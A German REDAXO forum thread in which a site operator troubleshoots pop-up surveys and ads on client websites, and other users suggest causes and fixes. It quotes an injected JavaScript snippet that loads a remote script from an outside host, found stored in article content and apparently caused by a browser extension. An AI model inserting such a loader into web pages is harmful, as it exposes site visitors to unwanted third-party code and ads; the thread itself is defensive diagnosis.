Hallo und HILFE !!!
Folgendes Problem tritt seit einigen Tage bei unterschiedlichen Kunden auf:
Nach einigen Klicks (unterschiedlicher Anzahl) erscheint plötzlich in einem neuen Fenster mal eine Umfrage, mal ein Gewinnspiel. Heißt also - irgendwo ist ein Hack auf der Seit o.ä.
Zwei Systeme waren 4.4.1 - hier habe ich das TinyModul schon getauscht. Eine andere Seite habe ich komplett auf 4.6.1. und Tiny 2.5 geswitcht und die Sicherung wieder eingespielt. Trotzdem ist das hier immer noch?!
Hat jemand eine Idee was ich tun kann bzw. wo sich das "versteckt" um das zu eliminieren?!
Danke, Tim Pohlmann
Hallo,
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
Re: Seite gehackt?!
Klingt schon nach nem Hack. Du musst halt mal die Seite analysieren z.B. mit Firebug und schauen woher die Fenster geöffnet werden. Vermutlich wurden die Javascript-Dateien manipuliert also kannst du da auch mal einen Blick reinwerfen.
Zuletzt geändert von RexDude am 24. Sep 2014, 15:53, insgesamt 1-mal geändert.
- Ruediger.Nitzsche
- Beiträge: 2117
- Registriert: 13. Dez 2005, 09:29
- Wohnort: Coburg
- Kontaktdaten: Website
Re: Seite gehackt?!
Filezilla + Windows + Trojaner evtl. im Spiel?
Rüdiger
Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert
Supportanfragen per PN werden gepflegt ignoriert
- Jan.Kristinus
- Admin
- Beiträge: 2166
- Registriert: 24. Aug 2004, 22:11
- Wohnort: Frankfurt
- Kontaktdaten: ICQ Website
Re: Seite gehackt?!
Es gibt keine bekannte Sicherheitslücke in REDAXO. Aber es ist äußert schwierig, dass Script / Problem zu finden und zu entfernen. Hatte das bei einigen Kunden auch schon erlebt und diese Scripte haben sich an unterschiedlichsten Stellen reingeflanscht.
D.h, sehr penibel ALLES durchschauen. Dateisystem, Templates und Module. Alles was seltsam ist erstmal ausschalten oder entfernen. Pauschal lässt sich aber schwer helfen.
lg
Jan
D.h, sehr penibel ALLES durchschauen. Dateisystem, Templates und Module. Alles was seltsam ist erstmal ausschalten oder entfernen. Pauschal lässt sich aber schwer helfen.
lg
Jan
Yakamara Media GmbH & Co. KG | Kaiserstrasse 69 | 60329 Frankfurt
Tel.: 069-900.20.60.30
http://www.yakamara.de/
Tel.: 069-900.20.60.30
http://www.yakamara.de/
- Ruediger.Nitzsche
- Beiträge: 2117
- Registriert: 13. Dez 2005, 09:29
- Wohnort: Coburg
- Kontaktdaten: Website
Re: Seite gehackt?!
Bei allen uns bekannten Fällen waren es entweder ausgelesene FTP-Zugangsdaten oder Drittskripte, die mit im Account lagen und vergessen worden sind (phpMyAdmin für Agenturen, alte Wordpress & Co. sind da beliebte Kandidaten).
Rüdiger
Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert
Supportanfragen per PN werden gepflegt ignoriert
Re: Seite gehackt?!
.... ok, ich werde mal auf die Suche gehen, wobei das allerdings auch bei zwei Seiten aufgetreten ist, an denen wir die letzten Monate selber nicht dran waren, also das nicht von einem einzelnen Arbeitsplatz dort reingekommen ist. Zudem auch bei unterschiedlichen Anbietern mit versch. Zugangsdaten.
Danke schon mal bis hierher.
Danke schon mal bis hierher.
Re: Seite gehackt?!
Hallo,
ich habe nun etwas geforscht und in manchen Seiten ein Script gefunden (nur in den Artikeln im html zu sehen NICHT in der Datenbank):
<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxl ... ction(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
// ]]></script>
Kann es daran liegen?!
Allerdings ist KEIN ADON im Browser (wedre bei mir noch beim Kunden) installiert und auf allen Rechnern, die mit den Seiten arbeiten hat ein Virenscan nichts gefunden. Was kann ich nun machen und woher kommt das? Ich stehe noch etwas auf dem Schlauch....
Meine Kunden sind arg abgenervt da auch zeitweise sexistische Einblendungen kommen.
Über Hilfe würde ich mich freuen.
Danke und Gruß
ich habe nun etwas geforscht und in manchen Seiten ein Script gefunden (nur in den Artikeln im html zu sehen NICHT in der Datenbank):
<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxl ... ction(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
// ]]></script>
Kann es daran liegen?!
Allerdings ist KEIN ADON im Browser (wedre bei mir noch beim Kunden) installiert und auf allen Rechnern, die mit den Seiten arbeiten hat ein Virenscan nichts gefunden. Was kann ich nun machen und woher kommt das? Ich stehe noch etwas auf dem Schlauch....
Meine Kunden sind arg abgenervt da auch zeitweise sexistische Einblendungen kommen.
Über Hilfe würde ich mich freuen.
Danke und Gruß
Re: Seite gehackt?!
Na entferns doch einfach, dann siehst du doch ob es daran liegt
- Ruediger.Nitzsche
- Beiträge: 2117
- Registriert: 13. Dez 2005, 09:29
- Wohnort: Coburg
- Kontaktdaten: Website
Re: Seite gehackt?!
Liegt definitiv nur REDAXO in den Accounts? Sind die FTP-Passwörter alle zurückgesetzt, was sagen die Logfiles des Hosters? Sind irgendwelche externen Datenquellen in die Seiten eingebunden?
Rüdiger
Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert
Supportanfragen per PN werden gepflegt ignoriert
- runstop64
- Beiträge: 369
- Registriert: 23. Okt 2012, 21:34
- Wohnort: Hamburg
- Kontaktdaten: Website Facebook Twitter
Re: Seite gehackt?!
Moin,
wie hast du das Problem denn bisher eingegrenzt? Schon ein Backup eingespielt? Auf einer unserer Websites hatte sich mal ein Hack über den FTP-Zugang des Kunden eingeschlichen und einfach ein paar Zeilen an eine der Startdateien angehängt, das ließ sich recht leicht am Datum der Dateien nachvollziehen. Hast du ansonsten definitiv ausgeschlossen, dass es eine FF Erweiterung ist? Laut Google scheint es da öfter Probleme zu geben.
Ist das Skript auch in der Quelltextansicht (Ctrl+U) oder nur über Firebug zu finden?
wie hast du das Problem denn bisher eingegrenzt? Schon ein Backup eingespielt? Auf einer unserer Websites hatte sich mal ein Hack über den FTP-Zugang des Kunden eingeschlichen und einfach ein paar Zeilen an eine der Startdateien angehängt, das ließ sich recht leicht am Datum der Dateien nachvollziehen. Hast du ansonsten definitiv ausgeschlossen, dass es eine FF Erweiterung ist? Laut Google scheint es da öfter Probleme zu geben.
Ist das Skript auch in der Quelltextansicht (Ctrl+U) oder nur über Firebug zu finden?
Re: Seite gehackt?!
...es ist nur Radxo auf den Servern (Plesk Oberfläche) - es betrifft derezti auch nur zwei Seiten mit dem 4.4.1 er System und altem TinyMCE (habe ich schon geupdated). Ich werde das eine System nue aufspielen, da die Datenbank "sauber" zu sein scheint und dann mal sehen ob alles weg ist....
Das Script ist nun überall raus - und immer noch ist der Hack drin ......
Danke und Gruß, Tim
Das Script ist nun überall raus - und immer noch ist der Hack drin ......
Danke und Gruß, Tim
Zuletzt geändert von skywise01 am 26. Sep 2014, 14:51, insgesamt 1-mal geändert.
Re: Seite gehackt?!
Also, alles zurück - das o.g. Script wurde in die datenbank geschrieben !?!
ich habe es dann in 14 Artikel Slice gefunden.
ich habe es dann in 14 Artikel Slice gefunden.
- runstop64
- Beiträge: 369
- Registriert: 23. Okt 2012, 21:34
- Wohnort: Hamburg
- Kontaktdaten: Website Facebook Twitter
Re: Seite gehackt?!
Ich würde das so erklären: Einer der Redakteure hat die FF-Erweiterung FoxLingo installiert, die ein Script zur Übersetzung (und Werbung) in Websites integriert, das hängt sich auch an die Editortexte dran und wird beim Speichern ungewollt ins Modul aufgenommen, wo es dann auch für alle, die die Erweiterung nicht haben das entsprechende Skript lädt. Scheint ein gängiges Problem bei allen CMS mit TinyMCE Texteditor zu sein (https://www.google.de/search?q=FoxLingo ... 8QfcuIDACQ)
Ich hatte letztens ein ähnliches Problem mit der Pinterest Erweiterung vom FF.
Vielleicht fragst Du mal nach, ob FoxLingo von einem der Redakteure genutzt wird.
Ich hatte letztens ein ähnliches Problem mit der Pinterest Erweiterung vom FF.
Vielleicht fragst Du mal nach, ob FoxLingo von einem der Redakteure genutzt wird.